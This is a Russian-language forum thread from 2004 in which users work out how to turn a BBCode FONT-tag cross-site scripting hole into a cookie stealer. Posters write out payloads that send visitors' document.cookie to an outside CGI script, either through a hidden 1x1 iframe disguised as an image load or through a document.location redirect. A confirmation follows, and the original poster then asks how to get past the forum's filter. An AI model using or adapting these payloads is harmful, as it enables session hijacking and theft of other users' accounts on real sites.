Межсайтовый скриптинг

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

Это нравится:0 Да/0 Нет

28.03.2004 23:30:47

Есть сервер, в котором мона осуществить межсайтовый скриптинг:
[FONT=expression(alert(document.cookie))]text</font> will made the HTML :
<span style='font-family:expression(alert(document.cookie))'>te xt</span>

Есть некий сервер server.com На нём лежит мой скрипт: server.com/cgi-bin/cookie.cgi

Задача: саму строку эксплоита модифицировать так, чтоб исполнялся мой скрипт с сервера server.com

Не поможите?

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

MishaSt

Guest

Это нравится:0 Да/0 Нет

28.03.2004 23:54:55

Делаешь IFRAME малюсенького размера, а src указываешь как твой скрипт с кукой.
<SCRIPT>
int test(){
ifrm.src="http://www.script.ru/script.cgi?cookie="+document. cookie;
return 1;
}
test()
</SCRIPT>
<IFRAME src="http://img.yandex.ru/i/logo2.gif" NAME="ifrm" HEIGHT=1 WIDTH=1 FRAMEBORDER="1">
</IFRAME>

А лучше сделай, чтоб в IFRAME загружалась картинка, тогда будто картинка загружается, а на самом деле твой скриптик картинку вывел в поток.

А вообще тёги он наверное фильтрует, и здесь это не прокатит, но document.location поменять можно наверное. Да это и обойти можно, с помощью javascript-кода записать эти тёги:
document.write(0x2E,"text",0x.....);

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

Это нравится:0 Да/0 Нет

29.03.2004 23:24:53

MishaSt
Ты недопонял
Мне строку: [FONT=expression(alert(document.cookie))]text</font>

Нужно модифицировать так, чтоб был редирект на мой скрипт
И я спрашивал как это сделать? Я так понял, что модифицированный сплоит должен выглядеть так:

[FONT=expression(document.location.replace
('http://www.feronix.h12.ru/cgi-bin/cookie.cgi?cookie='+docu ment.cookie))]text</font>

Я всё правильно понял?

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Mr.Clumsy Guest	#4 Это нравится:0 Да/0 Нет 30.03.2004 07:08:25 Shanker, ты всё правильно понял.

Shanker мастер Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003 всего лишь человек...	#5 Это нравится:0 Да/0 Нет 30.03.2004 17:06:54 Mr.Clumsy Спасибо. Вот только проблема: форум,похоже, фильтрует такие штуки, т.к. после создания сообщения с кодом: [FONT=expression(document.location.replace ('http://www.feronix.h12.ru/cgi-bin/cookie.cgi?cookie='+docu ment.cookie))] после редактирования текст кода показан как: [FONT=expression(document.location.replace (] То есть сервак вырезал адрес редиректа. Я сначала думал, что это я стормозил и так написал, но после 5'икратного повтора редактирования сообщения понял, что всё-таки это форум вырезает Пытался вместо символа "+" писать "%2B" - всё равно вырезает (( Остаётся только проверить будет ли форум фильтровать, такие запросы, если я это в свою подпись включу... Или, может, есть другие способы обхода фильтра? "Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?